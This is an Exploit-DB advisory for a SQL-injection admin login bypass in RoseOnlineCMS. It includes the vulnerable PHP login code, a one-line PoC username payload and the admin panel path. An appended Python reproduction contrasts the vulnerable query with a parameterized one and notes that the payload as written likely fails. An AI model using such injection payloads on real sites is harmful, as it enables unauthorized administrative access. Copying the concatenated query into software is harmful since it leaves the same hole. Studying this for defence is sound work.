RoseOnlineCMS <= 3 B1 - Remote Login Bypass Exploit

2010-01-16T00:00:00
ID EDB-ID:11158
Type exploitdb
Reporter cr4wl3r
Modified 2010-01-16T00:00:00

Description

RoseOnlineCMS <= 3 B1 Remote Login Bypass Exploit. Web application exploit for the PHP platform (SQL injection in the admin login).

                            \#'#/
                            (-.-)
   --------------------oOO---(_)---OOo-------------------
   |  RoseOnlineCMS <= 3 B1 Remote Login Bypass Exploit |
   |      (works only with magic_quotes_gpc = off)      |
   ------------------------------------------------------

[!] Discovered: cr4wl3r <cr4wl3r[!]linuxmail.org>
[!] Download: http://sourceforge.net/projects/rosecms/files/
[!] Date: 16.01.2010
[!] Remote: yes

[!] Code:


<form action="<?php $PHP_SELF; ?>" method="post">

  <div align="center">
    <table width="295" border="0">
      <tr>
        <td width="64">Username:</td>
        <td width="215">
          <label>
          <input name="user" type="text" id="user">
          </label>
        </td>
      </tr>
      <tr>
        <td>Password:</td>
        <td><input name="pass" type="text" id="pass"></td>
      </tr>
    </table>
  </div>
  <p align="center">
    <em>
    <input name="submit" type="submit" id="submit" value="Login">
    </em>
</form>
</p>
<?php
if(isset($_POST['submit'])) {

// username and password sent from the login form
// $USER goes into the query untouched: with magic_quotes_gpc = off a single
// quote in it is not escaped, so this is the injection point
$USER = $_POST['user'];
// only the password is transformed (unsalted MD5), so it cannot carry SQL
$PASS = md5($_POST['pass']);

$sql = "SELECT * FROM `accounts` WHERE username='$USER' and password='$PASS' and accesslevel = '300'";
$result = mysql_query($sql);

// mysql_num_rows counts the rows the query returned
$count = mysql_num_rows($result);
// A matching admin account (accesslevel 300) is expected to yield exactly 1 row,
// so an injected WHERE clause has to match one row, not zero and not all of them

if($count == 1){
// Register USER and PASS in the session and link to the control panel (?op=admincp)
session_register("USER");
session_register("PASS");
echo('Logged in: <a href=?op=admincp>Click here</a> to go to the control panel.');
}
else {
echo "You are banned, or you are an user with no permission to enter.";
}
}
?>

[!] PoC: [RoseOnlineCMS_path]/modules/admin.php

    username : ' or '1=1
    password : cr4wl3r
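The login check from modules/admin.php and the PoC input above, reproduced in Python against an in-memory SQLite table so the injection can be inspected offline. This is an added example, not code from the advisory or from RoseOnlineCMS: the account rows are constructed, SQLite stands in for MySQL, and `open_db`, `vulnerable_query`, `login_vulnerable` and `login_safe` are names chosen here. It builds the same string-concatenated statement as admin.php, so the page's `' or '1=1` username can be seen landing inside the WHERE clause, and puts the bound-parameter version of the same check beside it.

```python
import hashlib
import sqlite3

# Constructed sample rows standing in for the CMS `accounts` table
# (not taken from a RoseOnlineCMS install). accesslevel is stored as
# text because admin.php compares it against the quoted literal '300'.
SAMPLE_ACCOUNTS = [
    ("admin", hashlib.md5(b"correct horse").hexdigest(), "300"),
    ("editor", hashlib.md5(b"hunter2").hexdigest(), "100"),
]


def open_db() -> sqlite3.Connection:
    """In-memory SQLite stand-in for the MySQL table admin.php queries (hypothetical helper)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE accounts (username TEXT, password TEXT, accesslevel TEXT)"
    )
    conn.executemany("INSERT INTO accounts VALUES (?, ?, ?)", SAMPLE_ACCOUNTS)
    return conn


def vulnerable_query(user: str, password: str) -> str:
    """Build the statement the same way admin.php does.

    Only the password passes through md5(); the username is spliced into
    the SQL verbatim, so a quote in it ends the string literal and the
    rest of the input becomes part of the WHERE clause.
    """
    pass_hash = hashlib.md5(password.encode()).hexdigest()
    return (
        f"SELECT * FROM accounts WHERE username='{user}' "
        f"and password='{pass_hash}' and accesslevel = '300'"
    )


def login_vulnerable(conn: sqlite3.Connection, user: str, password: str) -> int:
    """Row count of the string-built query; admin.php grants access only when it is 1."""
    return len(conn.execute(vulnerable_query(user, password)).fetchall())


def login_safe(conn: sqlite3.Connection, user: str, password: str) -> int:
    """Same check with bound parameters: the username is compared as data
    and can no longer change the shape of the statement."""
    pass_hash = hashlib.md5(password.encode()).hexdigest()
    rows = conn.execute(
        "SELECT * FROM accounts WHERE username=? AND password=? AND accesslevel=?",
        (user, pass_hash, "300"),
    ).fetchall()
    return len(rows)


if __name__ == "__main__":
    db = open_db()
    payload_user, payload_pass = "' or '1=1", "cr4wl3r"  # the advisory's PoC input
    print(vulnerable_query(payload_user, payload_pass))
    print("vulnerable rows:", login_vulnerable(db, payload_user, payload_pass))
    print("safe rows:      ", login_safe(db, payload_user, payload_pass))
    print("real admin:     ", login_vulnerable(db, "admin", "correct horse"))
```

Two things worth checking before running the PoC against a live install. First, the original code accepts the login only when the query returns exactly one row, so whatever lands in the WHERE clause has to match a single account. Second, AND binds tighter than OR, so the payload as written produces `username='' or ('1=1' and password='<md5>' and accesslevel = '300')`; on the constructed data it matches nothing, and on a real install it only matches an account whose username is empty or whose password really is cr4wl3r, so verify the row count rather than assume the bypass. The parameterized query has neither problem: the same input is compared to the username column as a literal string. In PHP the equivalent fix is a mysqli or PDO prepared statement with bound parameters, and a proper password hash in place of unsalted MD5; note also that `session_register` and the `mysql_*` functions used by the original no longer exist in current PHP, so reproducing the vulnerable code needs a legacy interpreter.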